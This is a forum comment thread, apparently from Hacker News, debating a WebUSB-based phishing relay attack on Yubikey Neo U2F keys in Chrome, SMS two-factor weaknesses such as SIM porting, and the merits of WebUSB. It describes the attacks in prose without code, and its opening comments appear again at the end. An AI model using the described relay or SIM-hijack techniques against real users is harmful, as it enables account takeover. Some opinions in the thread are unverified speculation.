> If a victim logs into a fake Google site, the phishing site passes on their username and password to the real Google login page. Then the spoofed site passes back Google's request for the user's U2F token and collects the Yubikey's unique answer, all via WebUSB. When that answer is then presented to the real Google site, the attackers gain access to the victim's account.
So basically they are somehow able to trick the yubikey neo into accepting a challenge from a different domain, by using the webusb API.
Reading further:
> The technique would only work with U2F keys that offer protocols for connecting to a browser other than the usual way U2F tokens communicate with a computer, known as the Human Interface Device or HID, which isn't vulnerable to the attack. The Yubikey Neo, for instance, can also connect via the CCID interface used by smartcard readers
> An assumption was made by Chrome that all U2F is HID, which doesn't hold for the Neo, whereas Yubico made an assumption that USB will never be accessible by web pages directly
So:
- Don't use a Yubikey Neo anymore
- Don't use Chrome
- Don't use U2F because FireFox doesn't support it
- Never use your yubikey because hardly anything supports it
Nonsense. It works fine on Github, Fastmail, Gandi... it doesn't work on Google because Google uses a different spec. That bug is about making Firefox compatible with the variation that Chrome/Google uses.
In this case, though, what happened is that Google implemented a different, earlier version of the spec than most everyone else. Mozilla is busy implementing that spec as well to bridge the gap.
Firefox barely supports U2F. It works on Github and Dropbox, but doesn't work on sites like Vanguard and Google. Every time I do a Firefox update I do a search of the bug listing and they seem to have an incomplete implementation of the spec. They're kicking the can until they fully implement the WebAuth API and jump over dealing with whatever earlier spec they were targeting.
Speaking of which, why does Vanguard force you to still have SMS two factor available even when you add a U2F device...
Haha it's funny you put it this way because actually it's Firefox that implements FIDO U2F standard correctly and Chrome is not. Chrome uses low level API to communicate with their built in extension and the high level shim that they provide is not 100% spec compliant.
Google did not bother to use the U2F correctly on their accounts site, Github for example did it correctly and their 2FA works on any browser (that is FF and Chrome).
The usual rationale from companies forcing SMS two factor is that you need to have a convenient account-recovery mechanism before you enable something strict and lock yourself out. They don't want the support cost of dealing with these lockouts.
Unfortunately, these same companies often then claim that there is no harm in SMS two factor since "clearly it is stronger than one factor". But they are blind to their own systematic design flaw which is that the same SMS setting to enable two factor also usually enables one-factor password-recovery via this supposedly trusted phone.
Given what we know about SMS security, it is pretty obvious that one-factor SMS is weaker than one-factor good strong password. And if the good strong password can be merrily reset by whomever hijacks your phone, you have really just decreased your security posture while performing this whole security theater around two-factor and hardware tokens.
Correct me if I am wrong, but these SMS-based login setups are only sending a message to your phone number. It's about as secure as sending an email to your email address. There is no end-to-end security between the original sender and the subscriber's phone and SIM card to ensure that the message only gets to the correct recipient.
You only need to hijack the victim's phone number so that messages are sent elsewhere. This can be done by technical or social hacks such as porting the subscriber's number to a new provider or pretending a phone was lost and having the phone company register a replacement SIM. There is no need to physically intercept the victim's phone, so it is not in fact a second factor.
> Chrome on Android using either a OTG cable for a U2F USB key
Which key did you use? I tried Yubikey 4 (via OTG cable) and 4C (directly) and the U2F flow with Authenticator did not work (just like the key would not be recognized for U2F).
It's simple: allowing sandboxed code to request limited access to a USB device is more secure than having users install native, unsandboxed code with access to everything on their PC.
Not every link you click. Only sites that you grant access to the necessary attack surface. The Web USB API can't be attacked by sites that you haven't granted access to it.
As opposed to native desktop apps, which get all the same permissions by default that a web app requires a zero-day sandbox escape vulnerability to achieve?
Native desktop apps are limited in number are nowhere near the dumpster fire the web is. My desktop isn't routinely downloading and executing payloads from the web. They're clearly different.
This is about the Web USB API, not the entire web in general. Are you routinely granting web pages access to your USB devices? That's not a permission that web apps get by default (unlike with native desktop apps btw).
It comes down to this: if you ever found yourself in a situation where you needed to connect a USB device to a remote service, would you prefer to download that service's unsandboxed native code to your PC and execute it? Or execute some JS in the browser sandbox and grant it limited access to that one specific device?
Would that include the "Run" button on a downloaded executable?
While obviously we want to do as much as we can to discourage users from shooting themselves in the foot, there are limits. At some point, eventually you _do_ have to trust that the user knows what he's doing.
Giving users a choice on when to allow a page access to one specific USB device is not a "disaster".
I think WebUSB will enable a lot of cool things, though it will definitely be hard to sandbox.
I want to program an Arduino from a web IDE. I want to control a 3d printer or pen plotter from a web application. I want to store things on a flash drive on my iPhone using a web-based file explorer? This last one sounds strange.
On a tangent, I see application runtimes moving into the browser by default with very few performance-critical applications remaining outside that stack. Photoshop and AAA games might be exceptions. Services like databases and web browsers would not have a need to be in Chrome.
Just because its possible, doesn't mean we should!
I see nearly no good reason for any of those uses to be web-based, and certainly not with hardware control! If you want to store files on your flash drive, the browser should handle that, not give out direct usb access...
Hearing this exists was a shock, like when the first Android 'Instant' load app showed up on my phone (apps that you don't install, but run themselves if you goto a website or a physical store, and without asking you)
Getting 400 students up and running with python is painful alone - without USB. For projects, some small fraction of those used USB, and we again had a pretty good chunk of time spent getting them all working.
I worked for an online retailer a long long time ago and this would have been nice to have at our packstations. The tech at each station consisted of a Linux desktop, a barcode scanner, a printer, and a scale. The commerce platform was web based and displayed the current weight on the scale on the pack page.
Originally the scale was connected via serial port to the desktop. A little Perl service we called "the scale daemon" exposed the current weight on some localhost port. The backend would constantly poll that service and the web browser would poll the backend to keep the value on the page up to date. It was a nifty solution albeit a bit clumsy and it meant running an extra piece of software on 50+ machines in a warehouse.
At some point our scale vendor stopped selling scales with serial connections or maybe it was that the PC vendor stopped including serial ports. It was 10+ years ago and I can't recall exactly. What I do remember is that the guy that wrote the scale daemon had moved on and I had to figure out how to make it work with USB. It was fun and probably not as hard as it seemed at the time, but wow, being able to get at that scale from inside the browser would have massively simplified things.
More importantly: "the phishing site would also have to ask the user's permission to enable WebUSB access to their Yubikey, and then tap the physical button on the key."
So don't do that. It would be nice to know exactly what this dialog looks like, but it seems low risk?
Convincing users to grant access to a USB device when they're attempting to log in to a service using said USB device sounds like something that would work more often than not. We wouldn't need phishing-resistant authentication methods if humans were good enough at making those kinds of decisions.
I have to admit that in all of my use of my Yubikey Neo in Chrome I don't recall ever being asked for permission to access the device. Firefox hasn't asked either.
I'm not saying that you need to grant any kind of permission in order to use U2F tokens, but rather that a user thinking "I want to login to Google" and "I need to use that USB key thingy to do that" is quite likely to accept a prompt that requests access to the U2F device.
Sorry, I guess what I was getting at is that in hindsight I'm surprised no browser ever explicitly asked me for access to the Yubikey or told me why it needed, I've just blindly trusted it because of the few sites I use it with.
On the other hand, it's basically functioning as another keyboard device and not a special USB device so it shouldn't be that surprising, right? (serious question)
How about you tell users to simply not enter their password into phishing sites?
When users want to do something (sign in) and there are instructions on the page telling them to do something (enter password or accept usb) then the users will do it.
Presumably you are referring to WebAuthn[1]. I am optimistic that this will lead to better browser support, and consequently better website support. IIRC it's expected to reach Firefox stable in the May release. Hopefully the various sites that currently only support U2F in Chrone will move to this new standard.
I didn't even realize web USB was a thing now. I remember it being talked about, but I must have missed the HN conversation when Chrome implemented it.
So does Chrome ask for permission to allow USB access? Or maybe there's something about this I'm not getting.
There is a permission prompt, but it's fairly easy to convince users to accept it during a login attempt when they're expecting their USB U2F device to be used.
It's surprising that this works. Last time I checked WebUSB the device would have to have a descriptor allowing its use via web page effectively white listing what can be used on the web.
While I understand the reasoning behind that move, I'm not sure I fully agree with it. I don't think users will necessarily understand the implications of granting a site access to a device that wasn't designed with attacks from malicious code as part of its threat model. At the very least, the wording on the permissions dialog should be changed to indicate that the user is granting the site _full control_ over the device they're connecting it to.
Or just don't click "Connect" on the USB access permissions prompt when it pops up.
Unfortunately though, as with any phishing attack, this flaw is most likely to be effective against uninformed users, and those users are the least likely to take proactive measures to protect themselves beforehand.
Fortunately:
> "We will have a short term mitigation in place in the upcoming version of Chrome, and we're working closely with the FIDO Alliance to develop a longer-term solution as well."
tqbf, pinboard, and zeynep are handing them out to journalists.
There is an enormous need for some solution resistant to users who aren't good at identifying legitimate vs phishing sites. U2F as it stands is the only practical and deployed solution to that problem. It's infuriating that chrome broke this security promise to compete with microsoft.
It sounds like the report glossed over a rather important bit of ux:
If, when logging in, you see a big modal dialog asking if you want to grant webusb access to the site, then DONT select your yubikey out of the list of connected USB devices and click "Allow".
As long as you can convince yourself to avoid taking that particular unusual action, it sounds like you're fine.
They're slowly inventing operating systems, complete with hypervisor technology, with all the gargantuan complexity that it implies, to please big business that wants the client OS to essentially become obsolete.
The web browsers are so much more secure than what we had before (just accepting executable binaries from other people), so I look at this as a way forward.
I'm not that confident. Browsers blindly accept and execute whatever they receive. The more features that get added, the larger surface there is to exploit. A case in point: WebUSB as mentioned in the article.
The nice thing though is that, although the added attack surface is there, its not really accessible to web pages until a user grants the necessary permissions. Not really all that different from telling users to execute a native app in that respect.
In this case it's not even an exploit really; more like social engineering. (Tricking users into granting the phishing site unrestricted access to their Yubikey, then using that access to trick the user into authenticating a login session for the phishing site.)
A browser is more secure than a linux namespace with SELinux rules that require explicit approval for any access?
A browser is more secure than Qubes?
The flaw is in legacy software, not in what is possible. Had humanity spent the effort that was spent on browsers on operating systems instead, we'd have had the same security improvements without all the negatives.
When I see a shady link, I open it in a browser inside my virtual machine. I've had attacks on firefox that straight executed a binary on my machine, without me doing anything but clicking a link.
I'm unclear as to how this would work in practice. Chrome supports U2F out of the box, so getting a big weird pop-up asking to access your USB device, you'd at least be suspicious.
Upon registration, the server also collects a nonce, which is used for verification[0]. The attackers would need to get that nonce from the site. Hopefully, the site disables CORS so a phishing site cannot request a challenge.
Lastly, on Linux (I know, a minority), you need to make an entry in rules.d[1] to even allow Chromium to access USB devices.
I can see how this potentially maybe could catch someone, but I don't see it as much of a risk.
Part of the problem is that, assuming you didn't know much about how U2F works, it seems pretty natural for a site to request access to your YubiKey in order to use it to authenticate you.
I'd rephrase that to something more along the lines of "example.com wants full control of". Maybe with an option for device manufacturers to opt-in to support for WebUSB, allowing for protocol enhancements to improve security and a less scary permissions prompt.
>The attackers would need to get that nonce from the site.
The attackers have their own machine with a browser running on it that visits the real site and gets the nonce, then hands that nonce to the victim to be signed by their key.
What is the usecase for WebUSB? Here [1] someone from Google suggests vendors should write device drivers in Chrome HTML and Chrome Javascript. Please don't.
Or (my assuption) it might be for devices that cannot work without browser and network connection.
Yeah, the great thing about WebUSB is that it can easily be used to upgrade devices to new firmware with new features. For example, suppose that some end user's USB device lacks the ability to act like a USB Rubber Ducky and inject malicious keystrokes in order to compromise their machine. WebUSB allows a clean, easy way to fix that remotely.
Next step will be devices that cannot work without Chrome, network connection and "anonymous" "telemetry" for the purpose of "improving customer experience".
A website should never access to usb devices with just an allow prompt. Imagine taking control of a usb mouse or keyboard... You could then just take control of the machine...
I wish channel bound tokens were mandatory in the u2f spec, or a browser key was part of the auth request to the token, for exactly this reason. U2f is "optionally" unphishable.
I know a bit about token bound channels. But the u2f device only talks to Chrome via usb. So anything that the legitimate chrome could say to the u2f device (negotiating tokens, channels, etc) can now be done by the attacker via webusb. So I would think the attacker can get the u2f device's signature on the attacker's channel.
It should be just as if you unplugged your u2f device from your machine and plugged it into the attacker's machine.
I can't imagine that there would be such a writeup. Even just trying to understand the security framework of one browser is a gargantuan task.
As for Chrome being a real issue, some points off the top of my head:
- Its extension store breeds out malware in regular intervals (feels like there's headlines about that at least every other month).
- Pretty bad autofill exploit that was left unfixed for years: https://github.com/anttiviljami/browser-autofill-phishing
(Might've been fixed in the past year, I haven't checked, but I doubt it.)
- Chrome Sync is not end-to-end-encrypted without the use of a second password, which effectively means that it is unencrypted for 99.9% of Chrome users. Google also actively uses this data, weaving your browsing history into the profile that they keep of you. So, if they ever have a data leak, a lot of data is going to come from people using Chrome, too. The NSA/CIA/FBI also tap into this data, possibly using it for cyber war attacks, so if you live in a country other than the USA, you're making yourself a prime target and an easy target by inputting this data through Chrome.
Well, that's ironic. Just yesterday I subscribed to a magazine that offers a Yubikey as a free gift. The magazine? Wired.
It looks like this vulnerability is limited to Chrome at the moment. Good to know if using Chrome (or even Epichrome for SSBs) when doing things like online banking.
U2F != OTP, which is Yubikey 4. For some reason the FIDO alliance decided they didnt want OTP.
Yubikey 4 allows openPGP keys as well as OTP Yubikey functionality, making it half HSM/half token. the FIDO keys offered by Yubi only do asymmetric cryptography.
hmm. I assumed U2F does not protect you from phishing. It just adds a second layer of protection to your account. Protecting you from credential theft.
U2F antiphishing stuff implemented by chrome is just a neat little extra. Is this behaviour of checking the origin in the spec?
> If a victim logs into a fake Google site, the phishing site passes on their username and password to the real Google login page. Then the spoofed site passes back Google's request for the user's U2F token and collects the Yubikey's unique answer, all via WebUSB. When that answer is then presented to the real Google site, the attackers gain access to the victim's account.
So basically they are somehow able to trick the yubikey neo into accepting a challenge from a different domain, by using the webusb API.
Reading further:
> The technique would only work with U2F keys that offer protocols for connecting to a browser other than the usual way U2F tokens communicate with a computer, known as the Human Interface Device or HID, which isn't vulnerable to the attack. The Yubikey Neo, for instance, can also connect via the CCID interface used by smartcard readers
> An assumption was made by Chrome that all U2F is HID, which doesn't hold for the Neo, whereas Yubico made an assumption that USB will never be accessible by web pages directly
So:
- Don't use a Yubikey Neo anymore
- Don't use Chrome
- Don't use U2F because FireFox doesn't support it
- Never use your yubikey because hardly anything supports it
Sigh